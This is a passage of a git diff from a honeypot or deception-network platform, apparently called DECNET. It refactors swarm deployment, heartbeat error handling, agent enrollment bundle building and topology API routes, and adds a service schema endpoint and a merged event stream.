planner now reflects (keeps DB in sync with the # in-memory state — partial bodies merge into prior config). 
snapshot = planner.current_payload() @@ -112,4 +120,7 @@ async def put_config( user.get("username", user.get("uuid")), snapshot["canary_probability"], ) - return snapshot + response: dict[str, Any] = dict(snapshot) + if dropped: + response["dropped_entries"] = dropped + return response diff --git a/decnet/web/router/swarm/api_deploy_swarm.py b/decnet/web/router/swarm/api_deploy_swarm.py index 1142df8e..56f62843 100644 --- a/decnet/web/router/swarm/api_deploy_swarm.py +++ b/decnet/web/router/swarm/api_deploy_swarm.py @@ -57,6 +57,67 @@ def _worker_config( return base.model_copy(update=updates) +def _shard_payload( + d: DeckyConfig, + host_uuid: str, + state: str, + error: str | None, +) -> dict[str, Any]: + return { + "decky_name": d.name, + "host_uuid": host_uuid, + "services": json.dumps(d.services), + "decky_config": d.model_dump_json(), + "decky_ip": d.ip, + "state": state, + "last_error": error, + "updated_at": datetime.now(timezone.utc), + } + + +async def _dispatch( + host_uuid: str, + shard: list[DeckyConfig], + hosts: dict[str, dict[str, Any]], + config: DecnetConfig, + repo: BaseRepository, + dry_run: bool, + no_cache: bool, +) -> SwarmHostResult: + host = hosts[host_uuid] + cfg = _worker_config(config, shard, host) + try: + async with AgentClient(host=host) as agent: + body = await agent.deploy(cfg, dry_run=dry_run, no_cache=no_cache) + for d in shard: + await repo.upsert_decky_shard( + _shard_payload(d, host_uuid, "running" if not dry_run else "pending", None) + ) + await repo.update_swarm_host(host_uuid, {"status": "active"}) + return SwarmHostResult(host_uuid=host_uuid, host_name=host["name"], ok=True, detail=body) + except Exception as exc: + log.exception("swarm.deploy dispatch failed host=%s", host["name"]) + # Compose-up is partial-success-friendly: one decky failing to + # build doesn't roll back the ones that already came up. 
Ask the + # agent which containers actually exist before painting the whole + # shard red — otherwise decky1 and decky2 look "failed" even + # though they're live on the worker. + runtime: dict[str, Any] = {} + try: + async with AgentClient(host=host) as probe: + snap = await probe.status() + runtime = snap.get("runtime") or {} + except Exception: + log.warning("swarm.deploy: runtime probe failed host=%s — marking shard failed", host["name"]) + for d in shard: + rstate = runtime.get(d.name) or {} + is_up = bool(rstate.get("running")) + await repo.upsert_decky_shard( + _shard_payload(d, host_uuid, "running" if is_up else "failed", None if is_up else str(exc)[:512]) + ) + return SwarmHostResult(host_uuid=host_uuid, host_name=host["name"], ok=False, detail=str(exc)) + + async def dispatch_decnet_config( config: DecnetConfig, repo: BaseRepository, @@ -77,60 +138,11 @@ async def dispatch_decnet_config( raise HTTPException(status_code=404, detail=f"unknown host_uuid: {host_uuid}") hosts[host_uuid] = row - async def _dispatch(host_uuid: str, shard: list[DeckyConfig]) -> SwarmHostResult: - host = hosts[host_uuid] - cfg = _worker_config(config, shard, host) - try: - async with AgentClient(host=host) as agent: - body = await agent.deploy(cfg, dry_run=dry_run, no_cache=no_cache) - for d in shard: - await repo.upsert_decky_shard( - { - "decky_name": d.name, - "host_uuid": host_uuid, - "services": json.dumps(d.services), - "decky_config": d.model_dump_json(), - "decky_ip": d.ip, - "state": "running" if not dry_run else "pending", - "last_error": None, - "updated_at": datetime.now(timezone.utc), - } - ) - await repo.update_swarm_host(host_uuid, {"status": "active"}) - return SwarmHostResult(host_uuid=host_uuid, host_name=host["name"], ok=True, detail=body) - except Exception as exc: - log.exception("swarm.deploy dispatch failed host=%s", host["name"]) - # Compose-up is partial-success-friendly: one decky failing to - # build doesn't roll back the ones that already came up. 
Ask the - # agent which containers actually exist before painting the whole - # shard red — otherwise decky1 and decky2 look "failed" even - # though they're live on the worker. - runtime: dict[str, Any] = {} - try: - async with AgentClient(host=host) as probe: - snap = await probe.status() - runtime = snap.get("runtime") or {} - except Exception: - log.warning("swarm.deploy: runtime probe failed host=%s — marking shard failed", host["name"]) - for d in shard: - rstate = runtime.get(d.name) or {} - is_up = bool(rstate.get("running")) - await repo.upsert_decky_shard( - { - "decky_name": d.name, - "host_uuid": host_uuid, - "services": json.dumps(d.services), - "decky_config": d.model_dump_json(), - "decky_ip": d.ip, - "state": "running" if is_up else "failed", - "last_error": None if is_up else str(exc)[:512], - "updated_at": datetime.now(timezone.utc), - } - ) - return SwarmHostResult(host_uuid=host_uuid, host_name=host["name"], ok=False, detail=str(exc)) - results = await asyncio.gather( - *(_dispatch(uuid_, shard) for uuid_, shard in buckets.items()) + *( + _dispatch(uuid_, shard, hosts, config, repo, dry_run, no_cache) + for uuid_, shard in buckets.items() + ) ) return SwarmDeployResponse(results=list(results)) diff --git a/decnet/web/router/swarm/api_heartbeat.py b/decnet/web/router/swarm/api_heartbeat.py index df8bed24..dfcb4e3a 100644 --- a/decnet/web/router/swarm/api_heartbeat.py +++ b/decnet/web/router/swarm/api_heartbeat.py @@ -20,7 +20,8 @@ from collections.abc import MutableMapping from typing import Any, Optional from fastapi import APIRouter, Depends, HTTPException, Request -from pydantic import BaseModel +from pydantic import BaseModel, ValidationError +from sqlalchemy.exc import SQLAlchemyError from decnet.config import DeckyConfig from decnet.logging import get_logger @@ -61,7 +62,8 @@ def _extract_peer_fingerprint(scope: MutableMapping[str, Any]) -> Optional[str]: if chain: peer_der = chain[0] source = "primary" - except Exception: + except 
(AttributeError, KeyError, TypeError): + # scope["extensions"]["tls"] structure varies across uvicorn versions peer_der = None if peer_der is None: @@ -72,7 +74,8 @@ def _extract_peer_fingerprint(scope: MutableMapping[str, Any]) -> Optional[str]: peer_der = ssl_obj.getpeercert(binary_form=True) if peer_der: source = "fallback" - except Exception: + except (AttributeError, OSError): + # transport may not be an SSL transport, or the handshake may be incomplete peer_der = None if not peer_der: @@ -121,7 +124,8 @@ async def _reconcile_topology_report( try: topos = await repo.list_topologies(status=TopologyStatus.ACTIVE) - except Exception: + except SQLAlchemyError: + # Non-fatal: reconcile is best-effort; the host stays alive regardless log.exception("heartbeat: could not list active topologies") return mine = [t for t in topos if t.target_host_uuid == host_uuid] @@ -132,14 +136,15 @@ async def _reconcile_topology_report( reported_hash = (reported or {}).get("applied_version_hash") for topo in mine: - tid = topo["id"] - if topo.get("needs_resync"): + tid = topo.id + if topo.needs_resync: continue expected: Optional[str] = None if reported_id == tid and reported_hash: try: hydrated = await hydrate(repo, tid) - except Exception: + except (SQLAlchemyError, KeyError, TypeError): + # Non-fatal: skip this topology; mutator reconcile loop will retry log.exception("heartbeat: hydrate failed tid=%s", tid) continue if hydrated is None: @@ -155,7 +160,8 @@ async def _reconcile_topology_report( "reported_id=%s reported_hash=%s expected=%s)", tid, host_uuid, reported_id, reported_hash, expected, ) - except Exception: + except SQLAlchemyError: + # Non-fatal: mutator reconcile loop will detect the mismatch again next heartbeat log.exception("heartbeat: failed to flag resync tid=%s", tid) @@ -193,7 +199,7 @@ async def heartbeat( for decky_dict in status_body.get("deckies") or []: try: d = DeckyConfig(**decky_dict) - except Exception: + except (ValidationError, TypeError): 
log.exception("heartbeat: skipping malformed decky payload host=%s", req.host_uuid) continue rstate = runtime.get(d.name) or {} diff --git a/decnet/web/router/swarm_mgmt/api_enroll_bundle.py b/decnet/web/router/swarm_mgmt/api_enroll_bundle.py index d557615c..eee6de80 100644 --- a/decnet/web/router/swarm_mgmt/api_enroll_bundle.py +++ b/decnet/web/router/swarm_mgmt/api_enroll_bundle.py @@ -18,20 +18,19 @@ the embedded payload. Two URLs, one paste. from __future__ import annotations import asyncio -import io import os import pathlib import secrets -import tarfile from dataclasses import dataclass from datetime import datetime, timedelta, timezone from typing import Optional from fastapi import APIRouter, Depends, HTTPException, Request, Response, status -from pydantic import BaseModel, Field from decnet.logging import get_logger from decnet.swarm import pki +from decnet.swarm.bundle_builder import build_tarball, render_bootstrap +from decnet.web.db.models.swarm import EnrollBundleRequest, EnrollBundleResponse from decnet.web.db.repository import BaseRepository from decnet.web.dependencies import get_repo, require_admin @@ -43,72 +42,6 @@ BUNDLE_TTL = timedelta(minutes=5) BUNDLE_DIR = pathlib.Path(os.environ.get("DECNET_ENROLL_BUNDLE_DIR", "/tmp/decnet-enroll")) # nosec B108 - short-lived 0600 bundle cache, env-overridable SWEEP_INTERVAL_SECS = 30 -# Include list — explicit set of paths that ship to the agent. An -# include list fails closed: anything new on the master (stray .env, dev -# venvs, data dumps, editor scratch dirs) cannot leak into the bundle -# just because we forgot to exclude it. -# -# What the agent actually needs: -# * pyproject.toml at the repo root, so ``pip install`` works against -# the bundle during enroll_bootstrap.sh. -# * the ``decnet/`` package, MINUS the master-only subtrees called out -# by _EXCLUDED_DECNET_SUBTREES — those never import on an agent host. 
-# Everything else the bootstrap needs (the INI, certs, systemd units) is -# synthesized in-memory by ``_build_tarball`` below — it never hits the -# filesystem walk. - -# Top-level files shipped verbatim. Relative to the repo root. -_INCLUDED_ROOT_FILES: tuple[str, ...] = ("pyproject.toml",) - -# Top-level directories walked into the bundle. Relative to the repo root. -_INCLUDED_DIRS: tuple[str, ...] = ("decnet",) - -# Subtrees of an included directory that must NOT ship. Paths are -# relative to the repo root, forward-slash separated. -# * ``decnet/web`` — FastAPI master app, unused by agents. -# * ``decnet/mutator`` — schedules respawns swarm-wide; master-only. -# * ``decnet/profiler`` — rebuilds profiles against the master DB. -_EXCLUDED_DECNET_SUBTREES: frozenset[str] = frozenset({ - "decnet/web", - "decnet/mutator", - "decnet/profiler", -}) - - -# --------------------------------------------------------------------------- -# DTOs -# --------------------------------------------------------------------------- - -class EnrollBundleRequest(BaseModel): - master_host: str = Field(..., min_length=1, max_length=253, - description="IP/host the agent will reach back to") - agent_name: str = Field(..., pattern=r"^[a-z0-9][a-z0-9-]{0,62}$", - description="Worker name (DNS-label safe)") - with_updater: bool = Field( - default=True, - description="Include updater cert bundle and auto-start decnet updater on the agent", - ) - use_ipvlan: bool = Field( - default=False, - description=( - "Run deckies on this agent over IPvlan L2 instead of MACVLAN. " - "Required when the agent is a VirtualBox/VMware guest bridged over Wi-Fi — " - "Wi-Fi APs bind one MAC per station, so MACVLAN's extra container MACs " - "rotate the VM's DHCP lease. Safe no-op on wired/bare-metal hosts." 
- ), - ) - services_ini: Optional[str] = Field( - default=None, - description="Optional INI text shipped to the agent as /etc/decnet/services.ini", - ) - - -class EnrollBundleResponse(BaseModel): - token: str - command: str - expires_at: datetime - host_uuid: str - # --------------------------------------------------------------------------- # In-memory registry @@ -156,181 +89,16 @@ def _ensure_sweeper() -> None: _SWEEPER_TASK = asyncio.create_task(_sweep_loop()) -# --------------------------------------------------------------------------- -# Tarball construction -# --------------------------------------------------------------------------- - -def _repo_root() -> pathlib.Path: - # decnet/web/router/swarm_mgmt/api_enroll_bundle.py -> 4 parents = repo root. - return pathlib.Path(__file__).resolve().parents[4] +def _now() -> datetime: + # Indirection so tests can monkeypatch. + return datetime.now(timezone.utc) -def _iter_included(root: pathlib.Path) -> "list[tuple[pathlib.Path, str]]": - """Return ``(full_path, arcname)`` pairs for every file the agent needs. - - Walk is pruned in-place: ``__pycache__`` and the master-only subtrees - in :data:`_EXCLUDED_DECNET_SUBTREES` are skipped at the directory - level so we never descend into them (critical on dev boxes where - ``decnet/web/`` pulls in a fat frontend tree via package-data). - """ - found: list[tuple[pathlib.Path, str]] = [] - - # Top-level files. - for rel in _INCLUDED_ROOT_FILES: - p = root / rel - if p.is_file(): - found.append((p, rel)) - - # Top-level dirs, pruned. - for top in _INCLUDED_DIRS: - start = root / top - if not start.is_dir(): - continue - for dirpath, dirnames, filenames in os.walk(start, topdown=True, followlinks=False): - dir_path = pathlib.Path(dirpath) - rel_dir = dir_path.relative_to(root).as_posix() - - # Prune excluded subtrees + cache dirs BEFORE descending. 
- dirnames[:] = [ - d for d in dirnames - if d != "__pycache__" - and f"{rel_dir}/{d}" not in _EXCLUDED_DECNET_SUBTREES - ] - - for fn in filenames: - if fn.endswith((".pyc", ".pyo")): - continue - full = dir_path / fn - if full.is_symlink(): - continue - found.append((full, f"{rel_dir}/{fn}")) - - # Deterministic tarball ordering. - found.sort(key=lambda t: t[1]) - return found - - -def _render_decnet_ini( - master_host: str, - host_uuid: str, - use_ipvlan: bool = False, - swarmctl_port: int = 8770, -) -> bytes: - ipvlan_line = f"ipvlan = {'true' if use_ipvlan else 'false'}\n" - return ( - "; Generated by DECNET agent-enrollment bundle.\n" - "[decnet]\n" - "mode = agent\n" - "disallow-master = true\n" - "log-directory = /var/log/decnet\n" - f"{ipvlan_line}" - "\n" - "[agent]\n" - f"master-host = {master_host}\n" - f"swarmctl-port = {swarmctl_port}\n" - "swarm-syslog-port = 6514\n" - "agent-port = 8765\n" - "agent-dir = /etc/decnet/agent\n" - "updater-dir = /etc/decnet/updater\n" - f"host-uuid = {host_uuid}\n" - ).encode() - - -def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes, mode: int = 0o644) -> None: - info = tarfile.TarInfo(name) - info.size = len(data) - info.mode = mode - info.mtime = int(datetime.now(timezone.utc).timestamp()) - tar.addfile(info, io.BytesIO(data)) - - -def _build_tarball( - master_host: str, - agent_name: str, - host_uuid: str, - issued: pki.IssuedCert, - services_ini: Optional[str], - updater_issued: Optional[pki.IssuedCert] = None, - use_ipvlan: bool = False, -) -> bytes: - """Gzipped tarball with: - - agent-required source (see :data:`_INCLUDED_DIRS` / - :data:`_INCLUDED_ROOT_FILES`; master-only decnet/ subtrees - pruned) - - etc/decnet/decnet.ini (pre-baked for mode=agent) - - home/.decnet/agent/{ca.crt,worker.crt,worker.key} - - home/.decnet/updater/{ca.crt,updater.crt,updater.key} (if updater_issued) - - services.ini at root if provided - """ - root = _repo_root() - buf = io.BytesIO() - with tarfile.open(fileobj=buf, 
mode="w:gz") as tar: - for path, arcname in _iter_included(root): - tar.add(path, arcname=arcname, recursive=False) - - _add_bytes( - tar, - "etc/decnet/decnet.ini", - _render_decnet_ini(master_host, host_uuid, use_ipvlan), - ) - for unit in _SYSTEMD_UNITS: - _add_bytes( - tar, - f"etc/systemd/system/{unit}.service", - _render_systemd_unit(unit, agent_name, master_host), - ) - _add_bytes(tar, "home/.decnet/agent/ca.crt", issued.ca_cert_pem) - _add_bytes(tar, "home/.decnet/agent/worker.crt", issued.cert_pem) - _add_bytes(tar, "home/.decnet/agent/worker.key", issued.key_pem, mode=0o600) - - if updater_issued is not None: - _add_bytes(tar, "home/.decnet/updater/ca.crt", updater_issued.ca_cert_pem) - _add_bytes(tar, "home/.decnet/updater/updater.crt", updater_issued.cert_pem) - _add_bytes(tar, "home/.decnet/updater/updater.key", updater_issued.key_pem, mode=0o600) - - if services_ini: - _add_bytes(tar, "services.ini", services_ini.encode()) - - return buf.getvalue() - - -_SYSTEMD_UNITS = ( - "decnet-agent", "decnet-forwarder", "decnet-engine", "decnet-updater", - # Per-host microservices — activated by enroll_bootstrap.sh. The - # profiler intentionally stays master-side: it rebuilds attacker - # profiles against the master DB, which workers don't share. 
- "decnet-collector", "decnet-prober", "decnet-sniffer", -) - - -def _render_systemd_unit(name: str, agent_name: str, master_host: str) -> bytes: - tpl_path = pathlib.Path(__file__).resolve().parents[1].parent / "templates" / f"{name}.service.j2" - tpl = tpl_path.read_text() - return ( - tpl.replace("{{ agent_name }}", agent_name) - .replace("{{ master_host }}", master_host) - ).encode() - - -def _render_bootstrap( - agent_name: str, - master_host: str, - tarball_url: str, - expires_at: datetime, - with_updater: bool, -) -> bytes: - tpl_path = pathlib.Path(__file__).resolve().parents[1].parent / "templates" / "enroll_bootstrap.sh.j2" - tpl = tpl_path.read_text() - now = datetime.now(timezone.utc).replace(microsecond=0).isoformat() - rendered = ( - tpl.replace("{{ agent_name }}", agent_name) - .replace("{{ master_host }}", master_host) - .replace("{{ tarball_url }}", tarball_url) - .replace("{{ generated_at }}", now) - .replace("{{ expires_at }}", expires_at.replace(microsecond=0).isoformat()) - .replace("{{ with_updater }}", "true" if with_updater else "false") - ) - return rendered.encode() +async def _lookup_live(token: str) -> _Bundle: + b = _BUNDLES.get(token) + if b is None or b.served or b.expires_at <= _now(): + raise HTTPException(status_code=404, detail="bundle not found or expired") + return b # --------------------------------------------------------------------------- @@ -403,7 +171,7 @@ async def create_enroll_bundle( ) # 3. Render payload + bootstrap. 
- tarball = _build_tarball( + tarball = build_tarball( req.master_host, req.agent_name, host_uuid, issued, req.services_ini, updater_issued, use_ipvlan=req.use_ipvlan, ) @@ -423,7 +191,7 @@ async def create_enroll_bundle( base = f"{scheme}://{netloc}" tarball_url = f"{base}/api/v1/swarm/enroll-bundle/{token}.tgz" bootstrap_url = f"{base}/api/v1/swarm/enroll-bundle/{token}.sh" - script = _render_bootstrap(req.agent_name, req.master_host, tarball_url, expires_at, req.with_updater) + script = render_bootstrap(req.agent_name, req.master_host, tarball_url, expires_at, req.with_updater) tgz_path.write_bytes(tarball) sh_path.write_bytes(script) @@ -446,18 +214,6 @@ async def create_enroll_bundle( ) -def _now() -> datetime: - # Indirection so tests can monkeypatch. - return datetime.now(timezone.utc) - - -async def _lookup_live(token: str) -> _Bundle: - b = _BUNDLES.get(token) - if b is None or b.served or b.expires_at <= _now(): - raise HTTPException(status_code=404, detail="bundle not found or expired") - return b - - @router.get( "/enroll-bundle/{token}.sh", tags=["Swarm Management"], diff --git a/decnet/web/router/topology/__init__.py b/decnet/web/router/topology/__init__.py index a251a064..10b06ddf 100644 --- a/decnet/web/router/topology/__init__.py +++ b/decnet/web/router/topology/__init__.py @@ -23,6 +23,7 @@ from .api_list_topologies import router as _list_router from .api_mutations import router as _mutations_router from .api_personas import router as _personas_router from .api_reap_orphans import router as _reap_router +from .api_tarpit import router as _tarpit_router from .api_teardown_topology import router as _teardown_router topology_router = APIRouter(prefix="/topologies", tags=["topologies"]) @@ -45,6 +46,7 @@ topology_router.include_router(_decky_router) topology_router.include_router(_edge_router) topology_router.include_router(_mutations_router) topology_router.include_router(_events_router) +topology_router.include_router(_tarpit_router) # Personas use 
a literal-suffix path (`/{id}/personas`) — register # before the bare `/{id}` getter so FastAPI's trie sees the literal # segment first. diff --git a/decnet/web/router/topology/_guards.py b/decnet/web/router/topology/_guards.py index c3c20fa5..944e1a4f 100644 --- a/decnet/web/router/topology/_guards.py +++ b/decnet/web/router/topology/_guards.py @@ -1,8 +1,6 @@ """Shared helpers for the Phase-3 child-CRUD routes.""" from __future__ import annotations -from typing import Any - from fastapi import HTTPException from decnet.topology.status import ( @@ -10,17 +8,18 @@ from decnet.topology.status import ( TopologyStatus, VersionConflict, ) +from decnet.web.db.models.topology import TopologySummary from decnet.web.dependencies import repo -async def get_topology_or_404(topology_id: str) -> dict[str, Any]: +async def get_topology_or_404(topology_id: str) -> TopologySummary: topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") return topo -async def assert_pending_or_409(topology_id: str) -> dict[str, Any]: +async def assert_pending_or_409(topology_id: str) -> TopologySummary: """Ensure the topology exists and is in ``pending`` state. The repo layer enforces the same rule inside mutation methods, but the @@ -28,11 +27,11 @@ async def assert_pending_or_409(topology_id: str) -> dict[str, Any]: the pre-condition before any side effect. """ topo = await get_topology_or_404(topology_id) - if topo["status"] != TopologyStatus.PENDING: + if topo.status != TopologyStatus.PENDING: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; free-form child edits are " + f"Topology is {topo.status!r}; free-form child edits are " f"pending-only. Use the mutation queue for active topologies." 
), ) diff --git a/decnet/web/router/topology/api_catalog.py b/decnet/web/router/topology/api_catalog.py index 74f42ee7..c94e5723 100644 --- a/decnet/web/router/topology/api_catalog.py +++ b/decnet/web/router/topology/api_catalog.py @@ -22,6 +22,8 @@ from decnet.web.db.models import ( NextIPResponse, NextSubnetResponse, ServiceCatalogResponse, + ServiceConfigFieldDTO, + ServiceSchemaResponse, ) from decnet.web.dependencies import repo, require_viewer @@ -42,7 +44,48 @@ router = APIRouter() async def api_list_services( _viewer: dict = Depends(require_viewer), ) -> ServiceCatalogResponse: - return ServiceCatalogResponse(services=all_service_names()) + from decnet.services.registry import all_services + registry = all_services() + return ServiceCatalogResponse( + services=all_service_names(), + fleet_singletons=[ + name for name, svc in registry.items() if svc.fleet_singleton + ], + ) + + +@router.get( + "/services/{service_name}/schema", + tags=["MazeNET Topologies"], + response_model=ServiceSchemaResponse, + responses={ + 401: {"description": "Missing or invalid credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Unknown service"}, + }, +) +@_traced("api.topology.catalog.service_schema") +async def api_service_schema( + service_name: str, + _viewer: dict = Depends(require_viewer), +) -> ServiceSchemaResponse: + """Return the declarative config schema for one service. + + Drives the schema-driven Inspector form on both Fleet and MazeNET. + Empty ``fields`` means the service has no customizable knobs yet — + the form renders a "No customizable fields" placeholder. 
+ """ + from decnet.services.registry import get_service + try: + svc = get_service(service_name) + except KeyError: + raise HTTPException(status_code=404, detail=f"Unknown service: {service_name!r}") + return ServiceSchemaResponse( + name=svc.name, + ports=list(svc.ports), + fleet_singleton=bool(svc.fleet_singleton), + fields=[ServiceConfigFieldDTO(**f.to_json()) for f in svc.config_schema], + ) @router.get( @@ -121,13 +164,13 @@ async def api_next_ip( if await repo.get_topology(topology_id) is None: raise HTTPException(status_code=404, detail="Topology not found") lans = await repo.list_lans_for_topology(topology_id) - lan = next((ln for ln in lans if ln["id"] == lan_id), None) + lan = next((ln for ln in lans if ln.id == lan_id), None) if lan is None: raise HTTPException(status_code=404, detail="LAN not found") deckies = await repo.list_topology_deckies(topology_id) - alloc = IPAllocator(subnet=lan["subnet"]) + alloc = IPAllocator(subnet=lan.subnet) for d in deckies: - ip = (d.get("decky_config") or {}).get("ips_by_lan", {}).get(lan["name"]) + ip = (d.decky_config or {}).get("ips_by_lan", {}).get(lan.name) if ip: try: alloc.reserve(ip) @@ -137,4 +180,4 @@ async def api_next_ip( ip = alloc.next_free() except AllocatorExhausted as e: raise HTTPException(status_code=409, detail=str(e)) - return NextIPResponse(subnet=lan["subnet"], ip=ip) + return NextIPResponse(subnet=lan.subnet, ip=ip) diff --git a/decnet/web/router/topology/api_decky_crud.py b/decnet/web/router/topology/api_decky_crud.py index 5525cdab..0223772a 100644 --- a/decnet/web/router/topology/api_decky_crud.py +++ b/decnet/web/router/topology/api_decky_crud.py @@ -58,10 +58,10 @@ async def api_create_decky( raise map_repo_exception(exc) from exc rows = await repo.list_topology_deckies(topology_id) - row = next((r for r in rows if r["uuid"] == decky_uuid), None) + row = next((r for r in rows if r.uuid == decky_uuid), None) if row is None: # pragma: no cover raise HTTPException(status_code=500, 
detail="Decky insert vanished") - return DeckyRow(**row) + return row @router.patch( @@ -99,10 +99,10 @@ async def api_update_decky( raise HTTPException(status_code=404, detail=str(exc)) from exc rows = await repo.list_topology_deckies(topology_id) - row = next((r for r in rows if r["uuid"] == decky_uuid), None) + row = next((r for r in rows if r.uuid == decky_uuid), None) if row is None: raise HTTPException(status_code=404, detail="Decky not found") - return DeckyRow(**row) + return row @router.delete( @@ -126,7 +126,7 @@ async def api_delete_decky( await assert_pending_or_409(topology_id) rows = await repo.list_topology_deckies(topology_id) - if not any(r["uuid"] == decky_uuid for r in rows): + if not any(r.uuid == decky_uuid for r in rows): raise HTTPException(status_code=404, detail="Decky not found") try: diff --git a/decnet/web/router/topology/api_delete_topology.py b/decnet/web/router/topology/api_delete_topology.py index ba00ba7d..8e09a72e 100644 --- a/decnet/web/router/topology/api_delete_topology.py +++ b/decnet/web/router/topology/api_delete_topology.py @@ -36,11 +36,11 @@ async def api_delete_topology( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - if topo["status"] not in _DELETABLE: + if topo.status not in _DELETABLE: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; teardown to 'torn_down' " + f"Topology is {topo.status!r}; teardown to 'torn_down' " f"before delete." 
), ) diff --git a/decnet/web/router/topology/api_deploy_topology.py b/decnet/web/router/topology/api_deploy_topology.py index 77b3f99f..6a3fa59d 100644 --- a/decnet/web/router/topology/api_deploy_topology.py +++ b/decnet/web/router/topology/api_deploy_topology.py @@ -63,11 +63,11 @@ async def api_deploy_topology( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - if topo["status"] != TopologyStatus.PENDING: + if topo.status != TopologyStatus.PENDING: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; only 'pending' topologies " + f"Topology is {topo.status!r}; only 'pending' topologies " f"can be deployed." ), ) diff --git a/decnet/web/router/topology/api_edge_crud.py b/decnet/web/router/topology/api_edge_crud.py index 3acd6dbc..96e3a9a5 100644 --- a/decnet/web/router/topology/api_edge_crud.py +++ b/decnet/web/router/topology/api_edge_crud.py @@ -46,13 +46,13 @@ async def api_create_edge( # Referential integrity: decky + LAN must belong to this topology. 
deckies = await repo.list_topology_deckies(topology_id) - if not any(d["uuid"] == body.decky_uuid for d in deckies): + if not any(d.uuid == body.decky_uuid for d in deckies): raise HTTPException( status_code=400, detail=f"decky {body.decky_uuid!r} not in topology {topology_id!r}", ) lans = await repo.list_lans_for_topology(topology_id) - if not any(r["id"] == body.lan_id for r in lans): + if not any(r.id == body.lan_id for r in lans): raise HTTPException( status_code=400, detail=f"lan {body.lan_id!r} not in topology {topology_id!r}", @@ -73,10 +73,10 @@ async def api_create_edge( raise map_repo_exception(exc) from exc edges = await repo.list_topology_edges(topology_id) - row = next((e for e in edges if e["id"] == edge_id), None) + row = next((e for e in edges if e.id == edge_id), None) if row is None: # pragma: no cover raise HTTPException(status_code=500, detail="Edge insert vanished") - return EdgeRow(**row) + return row @router.delete( @@ -100,7 +100,7 @@ async def api_delete_edge( await assert_pending_or_409(topology_id) edges = await repo.list_topology_edges(topology_id) - if not any(e["id"] == edge_id for e in edges): + if not any(e.id == edge_id for e in edges): raise HTTPException(status_code=404, detail="Edge not found") try: diff --git a/decnet/web/router/topology/api_events.py b/decnet/web/router/topology/api_events.py index 6fcab719..c7d89fbf 100644 --- a/decnet/web/router/topology/api_events.py +++ b/decnet/web/router/topology/api_events.py @@ -69,7 +69,7 @@ async def api_topology_events( # GET /topologies/{id}/mutations). Adding a new event family here # requires a threat-model review for F6/I (role leakage). 
topo = await get_topology_or_404(topology_id) - snapshot_status = topo["status"] + snapshot_status = topo.status in_flight: list[dict] = [] for state in _IN_FLIGHT_STATES: in_flight.extend(await repo.list_topology_mutations(topology_id, state=state)) @@ -102,38 +102,65 @@ async def api_topology_events( yield ": keepalive\n\n" return - sub = bus.subscribe(f"{_topics.TOPOLOGY}.{topology_id}.>") - try: + # Two subscriptions, merged through an asyncio.Queue: + # + # topology..> — lifecycle (status, mutation.*). + # decky.> — per-decky events, filtered to this + # topology by the event's payload. + # + # Decky events carry ``topology_id`` in their payload (see + # decnet.engine.services_live._publish); we discard ones + # that don't belong to this stream so a fleet decky sharing + # a name with a topology decky doesn't leak across. + topo_sub = bus.subscribe(f"{_topics.TOPOLOGY}.{topology_id}.>") + decky_sub = bus.subscribe(f"{_topics.DECKY}.>") + queue: asyncio.Queue = asyncio.Queue(maxsize=256) + + async def _pump(sub, *, only_topology: bool = False) -> None: async with sub: - sub_iter = sub.__aiter__() - while True: - if await request.is_disconnected(): - break - next_task = asyncio.ensure_future(sub_iter.__anext__()) + async for ev in sub: + if only_topology: + payload = ev.payload or {} + if payload.get("topology_id") != topology_id: + continue try: - event = await asyncio.wait_for(next_task, timeout=_KEEPALIVE_SECS) - except asyncio.TimeoutError: - next_task.cancel() - yield ": keepalive\n\n" - continue - except StopAsyncIteration: - break - # Map the bus event onto an SSE ``event:`` name that - # the frontend can switch on without parsing topics. 
- yield _format_sse( - _sse_name_for(event.topic), - { - "topic": event.topic, - "type": event.type, - "ts": event.ts, - "payload": event.payload, - }, + queue.put_nowait(ev) + except asyncio.QueueFull: + # Drop on overflow rather than backpressuring + # the bus; the snapshot + reconnect path will + # cover any gap a slow consumer creates. + pass + + topo_task = asyncio.create_task(_pump(topo_sub)) + decky_task = asyncio.create_task(_pump(decky_sub, only_topology=True)) + try: + while True: + if await request.is_disconnected(): + break + try: + event = await asyncio.wait_for( + queue.get(), timeout=_KEEPALIVE_SECS, ) + except asyncio.TimeoutError: + yield ": keepalive\n\n" + continue + yield _format_sse( + _sse_name_for(event.topic), + { + "topic": event.topic, + "type": event.type, + "ts": event.ts, + "payload": event.payload, + }, + ) except asyncio.CancelledError: pass except Exception: log.exception("topology events stream crashed topology_id=%s", topology_id) yield _format_sse("error", {"message": "Stream interrupted"}) + finally: + topo_task.cancel() + decky_task.cancel() return StreamingResponse( generator(), @@ -148,10 +175,25 @@ async def api_topology_events( def _sse_name_for(topic: str) -> str: """Derive an SSE ``event:`` name from a bus topic. - ``topology..mutation.applied`` → ``mutation.applied`` - ``topology..status`` → ``status`` + ``topology..mutation.applied`` → ``mutation.applied`` + ``topology..status`` → ``status`` + ``decky..service_added`` → ``decky.service_added`` + ``decky..service_removed`` → ``decky.service_removed`` Anything else is passed through unchanged so future topic families don't silently collapse onto a generic bucket. + + Bus topic segments are NATS-style tokens — no dots inside a segment + — which is why the leaf is ``service_added`` (underscore) here and + on the wire, not ``service.added``. The frontend's + ``useTopologyStream`` listens on the underscore form too. 
